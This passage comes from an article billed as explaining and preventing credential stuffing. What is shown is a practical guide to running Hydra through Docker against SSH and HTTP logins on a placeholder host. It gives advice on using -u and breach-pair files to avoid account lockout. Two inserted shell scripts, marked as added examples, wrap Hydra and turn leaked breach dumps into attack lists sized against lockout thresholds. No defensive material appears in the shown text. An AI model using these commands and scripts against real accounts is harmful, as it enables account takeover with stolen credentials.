Understanding and preventing credential stuffing attacks

Getting Your Hands Dirtier

In addition to harvesting lists of passwords and hunting for relevant usernames for credential stuffing on the command line, you need to consider the automation behind such attacks. Unsurprisingly, there are multiple automation tools.

One such tool, Hydra (sometimes called THC Hydra), is part of the Kali Linux suite of tools and available in Van Hauser's repository [10] on GitHub. Hydra is fast because it runs many login attempts in parallel over separate connections. Note the reminder in the README file [11]: "This Tool Is for Legal Purposes Only!"

Although I've only really talked about web services so far, Hydra purportedly supports a significant number of protocols as mentioned in the README file (see Table 1).

Table 1

Hydra Supported Protocols and Services

Asterisk          ICQ              Rlogin
AFP               IMAP             Rsh
Cisco AAA         IRC              RTSP
Cisco auth        LDAP             SAP/R3
Cisco enable      MEMCACHED        SIP
CVS               MONGODB          SMB
Firebird          MS-SQL           SMTP
FTP               MYSQL            SMTP Enum
HTTP-FORM-GET     NCP              SNMP v1+v2+v3
HTTP-FORM-POST    NNTP             SOCKS5
HTTP-GET          Oracle Listener  SSH (v1 and v2)
HTTP-HEAD         Oracle SID       SSHKEY
HTTP-POST         Oracle           Subversion
HTTP-PROXY        PC-Anywhere      Teamspeak (TS2)
HTTPS-FORM-GET    PCNFS            Telnet
HTTPS-FORM-POST   POP3             VMware-Auth
HTTPS-GET         POSTGRES         VNC
HTTPS-HEAD        Radmin           XMPP
HTTPS-POST        RDP
HTTP-Proxy        Rexec

A quick word of warning: Hydra can take a few attempts to get the command-line options right, so I recommend practicing on a Capture the Flag server or a service where you know the credentials in case you come across problems. I like to save successful command-line options for later.

There are a few ways to install Hydra (see the README [11] for more information). I will purposely cover generic commands. If you want to run these commands using the developer's preferred installation route with Docker, see the "Using Docker with Hydra" box. Docker is the preferred route because pulling the image's latest tag gives you the maintainer's most recent build without compiling anything locally.

Using Docker with Hydra

For the Docker installation route, you will need to make some tweaks to the generic commands used in this article. If you use local files on a laptop for usernames and passwords lists, then you need to mount the local directory into the Docker container. You also need to prepend some Docker commands to the Hydra commands.

An example of a Docker command would look as follows:

$ docker run -it vanhauser/hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s22 -t4 -I target.tld ssh

However, the above command won't work: the username and password lists live on your laptop, and nothing inside the container can see them until you mount a volume. To do that, you need to convert the above Hydra SSH command to mount local files into the container as follows:

$ docker run -it --mount type=bind,source=/home/chris,target=/tmp,readonly vanhauser/hydra -L /tmp/users.txt -P /tmp/passwords.txt -s22 -t4 -I target.tld ssh

Admittedly, there is a lot going on in the above command, so I'll break it down into sections. At the start, I prepend the docker run command and then bind-mount the local /home/chris directory (read only) to /tmp inside the container. I then point Docker at the vanhauser/hydra container image and tell Hydra to look in the container's /tmp directory for both the usernames and passwords files, before giving it a target host and telling it to use the ssh module.

If you are new to Docker, it may take a couple of attempts to tweak the generic commands, but it's not too difficult to transpose the other commands in this article using the examples shown here.
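The transposition described in this box is mechanical enough to script. The following shell function is an added example and not code from the article or from the Hydra project: it takes the generic arguments, bind-mounts the directory holding the two lists read-only into the vanhauser/hydra image, and rewrites the host paths for the container. The function name, the /lists mount point and the HYDRA_DRY_RUN switch are my own choices.

```shell
# Added example (not the article's own code): wrap a generic Hydra invocation
# so the list files are bind-mounted read-only into the vanhauser/hydra image
# and their paths rewritten for the container. The function name, the /lists
# mount point and the HYDRA_DRY_RUN switch are my own choices.
hydra_docker() {
    # usage: hydra_docker USERS_FILE PASSWORDS_FILE TARGET SERVICE [hydra options...]
    users=$1; passwords=$2; target=$3; service=$4
    shift 4

    # Fail early on the host; inside the container Hydra would only see /lists
    for f in "$users" "$passwords"; do
        [ -r "$f" ] || { echo "hydra_docker: cannot read $f" >&2; return 1; }
    done

    # One bind mount covers both lists only if they share a directory
    dir=$(cd "$(dirname "$users")" && pwd)
    pdir=$(cd "$(dirname "$passwords")" && pwd)
    if [ "$dir" != "$pdir" ]; then
        echo "hydra_docker: both lists must be in the same directory" >&2
        return 1
    fi

    # Host paths become /lists/<name> inside the container
    cusers=/lists/$(basename "$users")
    cpasswords=/lists/$(basename "$passwords")

    set -- docker run -it --mount "type=bind,source=$dir,target=/lists,readonly" \
        vanhauser/hydra -L "$cusers" -P "$cpasswords" "$@" "$target" "$service"

    if [ -n "${HYDRA_DRY_RUN:-}" ]; then
        printf '%s\n' "$*"     # print the assembled command instead of running it
    else
        "$@"
    fi
}

# The article's SSH run, assembled but not executed:
# HYDRA_DRY_RUN=1 hydra_docker /home/chris/users.txt /home/chris/passwords.txt target.tld ssh -s22 -t4 -I
```

Run it with HYDRA_DRY_RUN set first and compare the printed command with the one in this box; only then drop the variable to let it execute.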

To use Hydra this way, I need to install Docker, log into Docker Hub [12], and then create a token to pull from the vanhauser/hydra repository on Docker Hub. (The image is public, so the login is not strictly required, but authenticated pulls are subject to a less restrictive rate limit than anonymous ones.) On Debian Linux derivatives, such as Ubuntu, you can get started with the following command, run as root or via sudo:

$ apt update; apt install -y docker.io

Next you need to create a personal access token as shown in Figure 3. To get there, either log in or create a Docker Hub account and then click on Account Settings (top right) followed by Security (left).

Figure 3: Create a personal access token on Docker Hub.

Once you click on the blue New Access Token button (and choose read-only access), as shown in Figure 3, you're all set. (If you need additional help in setting up an access token, see [13]). Using this access token as the password, you can log into Docker Hub on the command line and see if your access token works as follows:

$ docker login -u chrisbinnie # change to your Docker Hub username
Password: <enter Personal Access Token here>

Warning: Your password will be stored unencrypted in /root/.docker/config.json. Configure a credential helper to remove this warning (see [14]).

Login Succeeded

Now that you have access to Docker Hub (public) images, you can pull Hydra's image with the code in Listing 2.

Listing 2

Pulling the Hydra Image

$ docker pull vanhauser/hydra
Using default tag: latest
latest: Pulling from vanhauser/hydra
90ac1ecaf92c: Pull complete
be7c66840ebb: Pull complete
<...snip...>

$ docker images
REPOSITORY        TAG       IMAGE ID       CREATED      SIZE
vanhauser/hydra   latest    d89f1bd1e06f   6 days ago   1.24GB

The docker images command confirms that you have pulled around one and a quarter gigabytes for Hydra. In order to check that the image is valid, you can open Hydra's help page with the following command:

$ docker run -it vanhauser/hydra -h

As the heavily abbreviated help page in Listing 3 shows, Hydra is ready to use. Note the authors' request in Listing 3: "Please do not use in military or secret service organizations, or for illegal purposes."

Listing 3

Hydra Help Page

Hydra v9.6dev (c) 2023 by van Hauser/THC & David Maciejak -- Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        use a non-random shuffling method for option -x
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
<...snip...>

Always Make Lists

As my first credential stuffing example using Hydra, I will target an SSH server. The syntax is simple and easy to follow (remember to refer to the "Using Docker with Hydra" box to use Docker with these commands). I start by using a local list (in the current directory) of passwords (in a file called passwords.txt) and just one username with a lowercase -l option as follows:

$ hydra -v -l chris -P passwords.txt -s22 -t4 -I target.tld ssh

Bear in mind that the server may lock a user out after three attempts, so focusing on one username isn't the ideal approach. Instead, you can collect a list of usernames and save them into a file, passed with the uppercase -L option, with full file paths as follows:

$ hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s22 -t4 -I target.tld ssh

By default Hydra works through the whole password list for one user before moving on to the next. The -u option from the help page loops around users instead, which spreads the attempts across accounts over time rather than piling them onto one account in quick succession. If your list is real breach data, that is, known login:password pairs, credential stuffing proper means trying each account only with the password leaked for it: put the pairs in one colon-separated file and pass it with -C instead of -L and -P.

That's all you need for attacking SSH servers. To attack a web application instead, replace ssh with http-get at the end and point -s at the web server's port, 80 here (I will explain -t shortly):

$ hydra -v -L /home/chris/users.txt -P /home/chris/passwords.txt -s80 -t4 -I target.tld http-get

Port 80 is the http-get module's default, so -s80 is optional; for a TLS-only site use https-get (or add -S, which performs the SSL connect for any module), and give the protected path as the module option after the module name if it isn't /.
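The lists themselves deserve as much care as the command line. The following shell script is an added example, not code from the article or the Hydra project: it normalises a constructed breach-style dump into the colon-separated file that Hydra's -C option expects, derives the -L and -P lists from it, and works out how many attempts each account would receive against a lockout threshold before anything is run. Function and file names are my own; the meaning of -C, -L, -P, -u and -e n is taken from the help text in Listing 3.

```shell
# Added example (not the article's own code): turn a breach-style dump of
# "login:password" pairs into the kinds of list Hydra accepts, and check the
# attempt budget against an account-lockout threshold before running anything.
# Function and file names are my own; the -C, -L, -P, -u and -e n semantics are
# those printed by hydra -h.

# Constructed sample dump (not real data), with the noise real dumps carry:
# duplicates, blank lines, leading whitespace, an empty password, a non-pair.
make_sample_dump() {
    cat > "$1" <<'EOF'
chris:Summer2023!
 alice:hunter2
chris:Summer2023!
bob:
bob:Password1

not-a-pair
alice:hunter2
EOF
}

# -C format: one "login:pass" per line, login trimmed, empty logins and empty
# passwords dropped (test empty passwords with -e n instead), duplicates removed.
# Everything after the first colon is the password, so colons inside it survive.
make_pairs() {
    # $1 = raw dump, $2 = pairs file for -C
    awk -F: 'NF >= 2 {
        login = $1; sub(/^[ \t]+/, "", login); sub(/[ \t]+$/, "", login)
        pass = substr($0, index($0, ":") + 1); sub(/[ \t]+$/, "", pass)
        if (login != "" && pass != "") print login ":" pass
    }' "$1" | sort -u > "$2"
}

# -L and -P lists for a cartesian-product run (every password against every user)
split_lists() {
    # $1 = pairs file, $2 = users file, $3 = passwords file
    cut -d: -f1 "$1" | sort -u > "$2"
    cut -d: -f2- "$1" | sort -u > "$3"
}

# With -L/-P each account receives one attempt per password in the list; with
# -C it receives only the pairs recorded for it. Returns 1 when the -L/-P run
# would reach the lockout threshold, so the caller can switch to -C or -u.
attempt_budget() {
    # $1 = users file, $2 = passwords file, $3 = lockout threshold
    users=$(wc -l < "$1" | tr -d ' '); passwords=$(wc -l < "$2" | tr -d ' ')
    echo "users=$users passwords=$passwords per_user=$passwords total=$((users * passwords))"
    [ "$passwords" -lt "$3" ]
}

# Demonstration on the constructed dump
d=$(mktemp -d)
make_sample_dump "$d/dump.txt"
make_pairs "$d/dump.txt" "$d/pairs.txt"
split_lists "$d/pairs.txt" "$d/users.txt" "$d/passwords.txt"
attempt_budget "$d/users.txt" "$d/passwords.txt" 3 ||
    echo "lockout risk: use -C $d/pairs.txt or add -u to loop around users"
```

With the three surviving pairs and a lockout threshold of three, the -L/-P run would deliver exactly three passwords to every account, so the script flags it; the -C file gives each account a single attempt.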
